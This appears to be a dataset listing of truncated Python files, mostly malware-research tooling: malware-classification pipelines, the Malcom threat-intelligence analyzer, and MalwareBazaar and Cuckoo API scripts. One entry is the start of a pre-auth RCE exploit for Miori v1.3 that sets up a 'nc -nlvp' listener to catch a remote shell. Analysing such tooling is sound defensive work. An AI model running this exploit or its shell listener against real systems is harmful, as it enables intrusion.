text
stringlengths
0
9.3M
import os import subprocess train={} test={} path='..' f=open(path+'/trainLabels.csv') fo=open('trainLabels.csv','w') fo.write(f.readline()) f1=open(path+'/sampleSubmission.csv') fo1=open('sampleSubmission.csv','w') fo1.write(f1.readline()) for line in f: xx=line.split(',') label=int(xx[-1]) if label not i...
import subprocess data_path='.' opcode_path='op_train' jump_path='jump_train' jump_map_path='jump_map_train' cmd='mkdir '+' '.join([opcode_path,jump_path,jump_map_path]) subprocess.call(cmd,shell=True) cmd='pypy get_ins.py xid_train.p '+' '.join([data_path+'/train',opcode_path]) subprocess.call(cmd,shell=True) cmd='...
from sklearn.ensemble import RandomForestClassifier import pickle import sys import numpy as np X1=np.array(pickle.load(open('X2g_train.p'))) X2=np.array(pickle.load(open('X3g_train.p'))) X3=np.array(pickle.load(open('X4g_train.p'))) X4=np.array(pickle.load(open('Xhead_train.p'))) X=np.hstack((X2,X1,X3,X4)) y=np.arra...
import os xid=[i.split('.')[0] for i in os.listdir('train') if '.asm' in i] Xt_id=[i.split('.')[0] for i in os.listdir('test') if '.asm' in i] f=open('trainLabels.csv') f.readline() label={} for line in f: xx=line.split(',') idx=xx[0][1:-1] label[idx]=int(xx[-1]) f.close() y=[label[i] for i in xid] import p...
import pickle import sys ########################################################## # usage # pypy getins.py xid_train.p ../../data/train ./ins_train ./jump_train # xid_train.p is a list like ['loIP1tiwELF9YNZQjSUO',''....] to specify # the order of samples in traing data # ../../data/train is the path of original tra...
import pickle import sys xid=pickle.load(open(sys.argv[1])) #unconditional_jump=['jmp','j','ja'] ins_path=sys.argv[2] jump_path=sys.argv[3] for cc,i in enumerate(xid): jmp={} tmp=pickle.load(open(ins_path+'/'+i+'.ins.p')) for add in tmp: if tmp[add] == 'jmp' or tmp[add]=='ja': jmp[add]...
import pickle import sys ########################################################## # usage # pypy get_jump_map.py xid_train.p ../../data/train ./jump_train ./jump_map_train # xid_train.p is a list like ['loIP1tiwELF9YNZQjSUO',''....] to specify # the order of samples in traing data # ../../data/train is the path of ...
import numpy,scipy.misc, os, array def get_feature(data_set = 'train', data_type = 'bytes'): files=os.listdir(data_set) with open('%s_%s_image.csv'%(data_set, data_type),'wb') as f: f.write('Id,%s\n'%','.join(['%s_%i'%(data_type,x)for x in xrange(1000)])) for cc,x in enumerate(files): ...
# -*- coding: utf-8 -*- ## instructions frequency from multiprocessing import Pool import os import csv paths = ['train','test'] instr_set = set(['mov','xchg','stc','clc','cmc','std','cld','sti','cli','push', 'pushf','pusha','pop','popf','popa','cbw','cwd','cwde','in','out', 'add','adc','sub','sbb','div','idiv','m...
import heapq import pickle import math from csv import DictReader import glob import os import csv def join_ngrams(num = 100000): dict_all = dict() for c in range(1,10): #print "merging %i out of 9"%c heap = pickle.load(open('gram/ngram_%i_top%i'%(c,num),'rb')) while heap: c...
from sklearn.ensemble import RandomForestClassifier as RF from sklearn.linear_model import LogisticRegression as LGR from sklearn.ensemble import GradientBoostingClassifier as GBC from sklearn.ensemble import ExtraTreesClassifier as ET from xgboost_multi import XGBC from sklearn import cross_validation from sklearn.cro...
from sklearn.ensemble import RandomForestClassifier as RF from sklearn.linear_model import LogisticRegression as LGR from sklearn.ensemble import GradientBoostingClassifier as GBC from sklearn.ensemble import ExtraTreesClassifier as ET from xgboost_multi import XGBC from sklearn import cross_validation from sklearn.cro...
from sklearn.ensemble import RandomForestClassifier as RF from sklearn.linear_model import LogisticRegression as LGR from sklearn.ensemble import GradientBoostingClassifier as GBC from sklearn.ensemble import ExtraTreesClassifier as ET from xgboost_multi import XGBC from sklearn import cross_validation from sklearn.cro...
import sys import pickle ########################################################## # usage # pypy rebuild_2g.py xid_train.p ../../data/train # xid_train.p is a list like ['loIP1tiwELF9YNZQjSUO',''....] to specify # the order of samples in traing data # ../../data/train is the path of original train data ###########...
import os,array import pickle import numpy as np import sys xid=pickle.load(open(sys.argv[1])) asm_code_path=sys.argv[2] train_or_test=asm_code_path.split('_')[-1] X = np.zeros((len(xid),2000)) for cc,i in enumerate(xid): f=open(asm_code_path+'/'+i+'.asm') ln = os.path.getsize(asm_code_path+'/'+i+'.asm') # len...
from sklearn.ensemble import RandomForestClassifier as RF from sklearn.linear_model import LogisticRegression as LGR from sklearn.ensemble import GradientBoostingClassifier as GBC from sklearn.ensemble import ExtraTreesClassifier as ET from xgboost_multi import XGBC from sklearn import cross_validation from sklearn.cro...
from sklearn.ensemble import RandomForestClassifier as RF from xgboost_multi import XGBC from sklearn import cross_validation from sklearn.cross_validation import StratifiedKFold as KFold from sklearn.metrics import log_loss import numpy as np import pandas as pd import pickle # create model_list def get_model_list()...
from csv import DictReader from datetime import datetime import pickle import heapq import sys # load data def load_label(path, label): result = [] for row in DictReader(open(path)): if int(row['Class']) == label: result.append((row['Id'])) return result # generate grams dictionary fo...
import pickle import sys xid=pickle.load(open(sys.argv[1])) data_path=sys.argv[2] asm_code_path=sys.argv[3] for cc,i in enumerate(xid): f=open(data_path+'/'+i+'.asm') fo=open(asm_code_path+'/'+i+'.asm','w') start=True for line in f: xx=line.split() for c,x in enumerate(xx): ...
import inspect import os import sys code_path = os.path.join( os.path.split(inspect.getfile(inspect.currentframe()))[0], "xgboost-master/wrapper") sys.path.append(code_path) import xgboost as xgb import numpy as np class XGBC(object): def __init__(self, num_round = 2, max_depth = 2, eta= 1.0, min_child_weight = 2...
__author__ = 'pyt' import sys import os from datetime import timedelta sys.path.insert(0, os.getcwd()) CELERY_SEND_EVENTS = True CELERY_TASK_PUBLISH_RETRY = True BROKER_HEARTBEAT = 30 BROKER_CONNECTION_RETRY = True BROKER_CONNECTION_MAX_RETRIES = 100 BROKER_CONNECTION_TIMEOUT = 4 CELERY_CREATE_MISSING_QUEUES = True ...
from analytics import Analytics from toolbox import debug_output a = Analytics() # Check if there are elements which have no created date nocreate = a.data.find({"date_created": None}).count() type = "error" if nocreate > 0 else "debug" debug_output("Elements without a date_created: {}".format(nocreate), type) # Che...
#!/usr/bin/env python # -*- coding: utf-8 -*- __description__ = 'Malcom - Malware communications analyzer' __author__ = '@tomchop_' __version__ = '1.3 alpha' __license__ = "GPL" import os, sys, argparse import netifaces as ni from Malcom.config.malconf import MalcomSetup from Malcom.auxiliary.toolbox import debug_ou...
from Malcom.feeds.core import FeedEngine import os all_feeds = [ "AsproxTracker", "CybercrimeTracker", "FeodoTracker", "MalcodeBinaries", "MalwaredRu", "MalwareTrafficAnalysis", "MalwareDomainList", "PalevoTracker", "TorExitNodes", "ZeusTrackerBinaries", "ZeusTrackerConfigs", "ZeusT...
__author__ = 'pyt' from celery import Celery from celery.utils.log import get_task_logger celery = Celery() celery.config_from_object('celeryconfig') logger = get_task_logger(__name__)
app = None feed_engine = None analytics_engine = None sniffer_sessions = {} config = {}
import time import threading import pickle import datetime import os from multiprocessing import Process # JoinableQueue as Queue, Lock import traceback import Queue as Queue from threading import Thread, Lock from Malcom.auxiliary.toolbox import * from Malcom.model.model import Model from Malcom.model.datatypes impo...
import json, threading, time, sys from Malcom.shmem.SharedData import Messenger from Malcom.auxiliary.toolbox import debug_output class AnalyticsMessenger(Messenger): """docstring for AnalyticsMessenger""" def __init__(self, analytics_instance): super(AnalyticsMessenger, self).__init__() self.name = 'analytics...
import socket, sys import inspect import urlparse import re import urllib2 import socket import json import datetime import string #from pyquery import PyQuery # external #from lxml import etree from dateutil.parser import parse import logging from subprocess import check_output, CalledProcessError, STDOU...
import ConfigParser import os import netifaces as ni class MalcomSetup(dict): """Configuraiton loader""" def __init__(self): super(MalcomSetup, self).__init__() def save_config(): raise NotImplemented def load_config(self, args): self.parse_command_line(args) self.san...
import os import time import threading import csv import imp from StringIO import StringIO from datetime import timedelta, datetime from multiprocessing import Process from lxml import etree import requests from Malcom.auxiliary.toolbox import debug_output from Malcom.model.model import Model from Malcom.feeds.core...
import urllib2 from bson.json_util import dumps, loads from Malcom.model.datatypes import Ip, Url, Hostname, As from Malcom.feeds.core import Feed class MalcomBaseFeed(Feed): """ This gets data from other Malcom Instances """ def __init__(self): super(MalcomBaseFeed, self).__init__(run_every="...
import json from bson import json_util from Malcom.auxiliary.toolbox import debug_output from Malcom.shmem.SharedData import Messenger class FeedsMessenger(Messenger): """REDIS messenger for FeedEngine""" def __init__(self, feedengine_instance): super(FeedsMessenger, self).__init__() self.na...
from Malcom.feeds.core.feed import FeedEngine, Feed # from Malcom.feeds.core.feed import Feed
import codecs from Malcom.feeds.core import Feed class ExportAll(Feed): """ This exports data from the db every 1h """ def __init__(self): super(ExportAll, self).__init__(run_every="1h") self.description = "Export all the dataset to CSV and JSON" self.source = "local" s...
import md5 import datetime import csv import requests import zipfile from StringIO import StringIO from Malcom.model.datatypes import Url from Malcom.feeds.core import Feed class Alexa(Feed): """ This is a feed that will fetch data from a Alexa's top 1M """ def __init__(self): super(Alexa, se...
import md5 import urllib2 import datetime import csv from Malcom.model.datatypes import Url from Malcom.feeds.core import Feed class AsproxTracker(Feed): """ This is a feed that will fetch data from a URL and process it """ def __init__(self): super(AsproxTracker, self).__init__(run_every="12...
import datetime import md5 from Malcom.model.datatypes import Url from Malcom.feeds.core import Feed import Malcom.auxiliary.toolbox as toolbox class CybercrimeTracker(Feed): def __init__(self): super(CybercrimeTracker, self).__init__(run_every="12h") self.description = "CyberCrime Tracker - Lat...
import datetime import re import md5 import Malcom.auxiliary.toolbox as toolbox from Malcom.model.datatypes import Ip, Hostname from Malcom.feeds.core import Feed class FeodoTracker(Feed): descriptions = { 'A': "Hosted on compromised webservers running an nginx proxy on port 8080 TCP forwarding ...
import md5 import re import sys from Malcom.feeds.core import Feed from Malcom.model.datatypes import Url class MalcodeBinaries(Feed): def __init__(self): super(MalcodeBinaries, self).__init__(run_every="1h") self.description = "Updated Feed of Malicious Executables" self.source = "http:...
import urllib2 import datetime import md5 from Malcom.model.datatypes import Url from Malcom.feeds.core import Feed from bs4 import BeautifulSoup class MalwaredRu(Feed): def __init__(self): super(MalwaredRu, self).__init__(run_every="1h") self.source = "http://malwared.malwaremustdie.org/rss.p...
from Malcom.model.datatypes import Hostname from Malcom.feeds.core import Feed import Malcom.auxiliary.toolbox as toolbox import datetime import md5 class MalwareDomainsDotCom(Feed): """ This is a feed that will fetch data from a URL and process it """ def __init__(self): super(MalwareDomains...
import re import md5 from Malcom.model.datatypes import Url from Malcom.feeds.core import Feed class MalwareDomainList(Feed): """ This gets data from http://www.malwaredomainlist.com/hostslist/mdl.xml """ def __init__(self): super(MalwareDomainList, self).__init__(run_every="12h") sel...
import urllib2 import re import datetime import md5 from Malcom.model.datatypes import Ip, Hostname from Malcom.feeds.core import Feed import Malcom.auxiliary.toolbox as toolbox class MalwareTrafficAnalysis(Feed): """ This is a feed that will fetch data from a URL and process it """ def __init__(self...
import re import md5 from Malcom.feeds.core import Feed from Malcom.model.datatypes import Hostname import Malcom.auxiliary.toolbox as toolbox class PalevoTracker(Feed): """ This gets data from https://palevotracker.abuse.ch/?rssfeed """ def __init__(self): super(PalevoTracker, self).__init__...
import urllib2 import md5 from Malcom.feeds.core import Feed import Malcom.auxiliary.toolbox as toolbox from Malcom.model.datatypes import Ip class TorExitNodes(Feed): """ This gets data from https://www.dan.me.uk/tornodes """ def __init__(self): super(TorExitNodes, self).__init__(run_every="...
import datetime import re import md5 from Malcom.model.datatypes import Url from Malcom.feeds.core import Feed class ZeusTrackerBinaries(Feed): def __init__(self): super(ZeusTrackerBinaries, self).__init__() self.source = "https://zeustracker.abuse.ch/monitor.php?urlfeed=binaries" self.d...
import datetime import re import md5 from Malcom.model.datatypes import Url from Malcom.feeds.core import Feed class ZeusTrackerConfigs(Feed): def __init__(self): super(ZeusTrackerConfigs, self).__init__(run_every="1h") self.source = "https://zeustracker.abuse.ch/monitor.php?urlfeed=configs" ...
import datetime import re import md5 from Malcom.model.datatypes import Url from Malcom.feeds.core import Feed class ZeusTrackerDropzones(Feed): def __init__(self): super(ZeusTrackerDropzones, self).__init__(run_every="1h") self.source = "https://zeustracker.abuse.ch/monitor.php?urlfeed=dropzone...
import datetime import os import sys from bson.json_util import dumps, loads from Malcom.auxiliary.toolbox import debug_output import Malcom.auxiliary.toolbox as toolbox try: import geoip2.database file = os.path.abspath(__file__) current_path = os.path.dirname(os.path.abspath(__file__)) path = os.pat...
# from gevent import monkey; monkey.patch_socket()#subprocess()#socket(dns=False); monkey.patch_time(); import dateutil import threading import os import pickle import pymongo from pymongo import MongoClient from pymongo.son_manipulator import SONManipulator from pymongo.read_preferences import ReadPreference import ...
import dateutil import threading import os import string import random import re import datetime from pymongo import MongoClient from pymongo.son_manipulator import SONManipulator from pymongo.read_preferences import ReadPreference import pymongo.errors from passlib.hash import pbkdf2_sha512 from flask.ext.login impor...
from bson import json_util import redis, threading, time, json, sys import random from Malcom.auxiliary.toolbox import debug_output # analytics class Messenger(object): """docstring for RedisSubscriber""" def __init__(self): pass # super(Messenger, self).__init__() self.r = redis.StrictRedis(host='localhost',...
from scapy.all import * from scapy.error import Scapy_Exception import pwd, os, sys, time, threading, string from bson.json_util import dumps, loads from bson import Binary from Malcom.model.datatypes import Url, Hostname, Ip import Malcom.auxiliary.toolbox as toolbox rr_codes = {1: "A", 28: "AAAA", 2: "NS", 5: "CNAM...
import json, threading, time, sys from bson import json_util from bson.json_util import loads as bson_loads from bson.json_util import dumps as bson_dumps from Malcom.shmem.SharedData import Messenger from Malcom.auxiliary.toolbox import debug_output class SnifferMessenger(Messenger): """docstring for SnifferMesseng...
import os import sys import time import threading import datetime import imp from scapy.all import * from bson.json_util import dumps as bson_dumps from bson.json_util import loads as bson_loads from bson.objectid import ObjectId from Malcom.sniffer.flow import Flow from Malcom.auxiliary.toolbox import debug_output f...
from ConfigParser import ConfigParser import os import re import datetime class Module(object): """docstring for Module""" def __init__(self): self.timeout = 24 self.load_conf() def add_static_tags(self, content): add = "" static_dir = os.path.join(os.path.dirname(os.path.r...
from scapy.all import * from Malcom.sniffer.modules.base_module import Module from Malcom.auxiliary.toolbox import debug_output classname = "PassiveDns" # This is a dummy module to give an example of what modules can be used for # PassiveDns is a very basic module that will go through all the packets # in a capture ...
''' Created on 13 mai 2015 @author: slarinier Thanks to inliniac and Regit for ideas: https://github.com/inliniac/suricata/blob/master/scripts/suricatasc/src/suricatasc.py ''' import glob import multiprocessing import os from socket import socket, AF_UNIX, error from subprocess import PIPE import subprocess from ti...
import os from scapy.all import * from bson.json_util import dumps as bson_dumps from bson.json_util import loads as bson_loads import yara from Malcom.sniffer.modules.base_module import Module from Malcom.auxiliary.toolbox import debug_output classname = "YaraScan" class YaraScan(Module): """Iterates over eac...
#!/usr/bin/env python # coding: utf-8 # inspired from http://musta.sh/2012-03-04/twisted-tcp-proxy.html import sys, threading from time import sleep from collections import deque from twisted.internet import defer, ssl from twisted.internet import protocol from twisted.internet import reactor class ProxyClientPro...
__author__ = 'pyt' from Malcom.analytics.analytics import Analytics from Malcom.celeryctl import celery from Malcom.feeds.mdlhostlist import MDLHosts from Malcom.feeds.mdliplist import MDLIpList from Malcom.feeds.mdltracker import MDLTracker @celery.task def mdlhosts_tasks(): mdl = MDLHosts("MDLHosts") mdl.a...
__author__ = 'pyt' from Malcom.feeds.alienvault import AlienvaultIP from Malcom.feeds.dshield_as16276 import DShield16276 from Malcom.feeds.dshield_as3215 import DShield3215 from Malcom.feeds.malcode import MalcodeBinaries from Malcom.feeds.malwarepatrol import MalwarePatrolVX from Malcom.feeds.openbl import OpenblIP ...
__author__ = 'pyt' from Malcom.tasks.zeus import (zeustrackerbinaries_tasks, zeustrackerconfigs_tasks, zeustrackergameoverdomains_tasks, zeustrackerdropzones_tasks ) from Malcom.tasks.spyeye impo...
__author__ = 'pyt' from Malcom.analytics.analytics import Analytics from Malcom.celeryctl import celery from Malcom.feeds.spyeyebinaries import SpyEyeBinaries from Malcom.feeds.spyeyeconfigs import SpyEyeConfigs from Malcom.feeds.spyeyedropzones import SpyEyeDropzones from Malcom.feeds.spyeyecnc import SpyEyeCnc @ce...
__author__ = 'pyt' from Malcom.analytics.analytics import Analytics from Malcom.celeryctl import celery from Malcom.feeds.zeustracker import ZeusTrackerBinaries from Malcom.feeds.zeusgameover import ZeusGameOverDomains from Malcom.feeds.zeusdropzones import ZeusTrackerDropzones from Malcom.feeds.zeusconfigs import Zeu...
__author__ = 'pyt'
from bson.json_util import dumps, loads from bson.objectid import ObjectId from bson.objectid import InvalidId from flask import Blueprint, render_template, abort, request, g, url_for, send_from_directory from flask.helpers import make_response from flask_restful import Resource, reqparse, Api, abort as restful_abort i...
from Malcom.shmem.SharedData import Messenger from Malcom.auxiliary.toolbox import send_msg, debug_output import json, time, redis, sys class WebMessenger(Messenger): def __init__(self): super(WebMessenger, self).__init__() self.name = 'web' debug_output("[+] WebMessenger started") self.subscribe_channel('...
#!/usr/bin/python # -*- coding: utf-8 -*- __description__ = 'Malcom - Malware communications analyzer' __author__ = '@tomchop_' __version__ = '1.3 alpha' __license__ = "GPL" # patch threads from gevent import monkey; monkey.patch_socket(dns=False); # system import os, datetime, time, sys, signal, argparse, re, pickl...
from flask import Blueprint, render_template, abort, request, g import gevent from bson.objectid import ObjectId from bson.json_util import dumps, loads from Malcom.web.webserver import login_required from Malcom.auxiliary.toolbox import * malcom_websockets = Blueprint('malcom_websockets', __name__) # APIs (web...
# Exploit for Miori v1.3 # Pre-Auth RCE # Discovery: 27.08.2019 # Written by @v3ded # Not to be used for malicious purposes. @v3ded doesn't condone malicious behaviour. import socket import os import sys import threading from time import sleep def Listen(port): os.system("nc -nlvp {}".format(port)) if(len(sys.arg...
#!/usr/bin/env python3 import requests import json import argparse __author__ = "Corsin Camichel" __copyright__ = "Copyright 2020, Corsin Camichel" __license__ = "Creative Commons Attribution-ShareAlike 4.0 International License." __version__ = "1.0" __email__ = "cocaman@gmail.com" parser = argparse.ArgumentParser(de...
#!/usr/bin/env python3 import requests import sys import argparse import json import pyzipper __author__ = "Corsin Camichel" __copyright__ = "Copyright 2020, Corsin Camichel" __license__ = "Creative Commons Attribution-ShareAlike 4.0 International License." __version__ = "1.0" __email__ = "cocaman@gmail.com" def chec...
#!/usr/bin/env python3 import requests import json import os from jq import jq __author__ = "Corsin Camichel" __copyright__ = "Copyright 2020, Corsin Camichel" __license__ = "Creative Commons Attribution-ShareAlike 4.0 International License." __version__ = "1.0" __email__ = "cocaman@gmail.com" JQ_QUERY = ".data[].sha...
#!/usr/bin/env python3 import requests import json import os from jq import jq __author__ = "Corsin Camichel" __copyright__ = "Copyright 2020, Corsin Camichel" __license__ = "Creative Commons Attribution-ShareAlike 4.0 International License." __version__ = "1.0" __email__ = "cocaman@gmail.com" JQ_QUERY = ".data[].sha...
#!/usr/bin/env python3 import requests import sys import argparse import json from jq import jq __author__ = "Corsin Camichel" __copyright__ = "Copyright 2020, Corsin Camichel" __license__ = "Creative Commons Attribution-ShareAlike 4.0 International License." __version__ = "1.0" __email__ = "cocaman@gmail.com" parse...
#!/usr/bin/env python3 import requests import json import argparse from jq import jq __author__ = "Corsin Camichel" __copyright__ = "Copyright 2020, Corsin Camichel" __license__ = "Creative Commons Attribution-ShareAlike 4.0 International License." __version__ = "1.0" __email__ = "cocaman@gmail.com" parser = argparse...
#!/usr/bin/env python3 import requests import json import sys import argparse __author__ = "Corsin Camichel" __copyright__ = "Copyright 2020, Corsin Camichel" __license__ = "Creative Commons Attribution-ShareAlike 4.0 International License." __version__ = "1.0" __email__ = "cocaman@gmail.com" parser = argparse.Argume...
#!/usr/bin/env python3 import requests import sys import argparse import json import hashlib import os __author__ = "Corsin Camichel" __copyright__ = "Copyright 2020, Corsin Camichel" __license__ = "Creative Commons Attribution-ShareAlike 4.0 International License." __version__ = "1.1" __email__ = "cocaman@gmail.com" ...
#!/usr/bin/env python3 import requests import sys import argparse import json import hashlib import os __author__ = "Corsin Camichel" __copyright__ = "Copyright 2020, Corsin Camichel" __license__ = "Creative Commons Attribution-ShareAlike 4.0 International License." __version__ = "1.0.0" __email__ = "cocaman@gmail.com...
import requests import json import pyzipper import hashlib import os class Bazaar: """Malware Bazaar class wrapper for methods and shared values Args: url (str, optional): URL of malware bazaar. Defaults to 'https://mb-api.abuse.ch/api/v1/'. api_key (str, optional): API Key to send requests wi...
import CuckooAPI api = CuckooAPI.CuckooAPI("10.0.0.144", APIPY=True, port=8090) api.submitfile("malware.exe")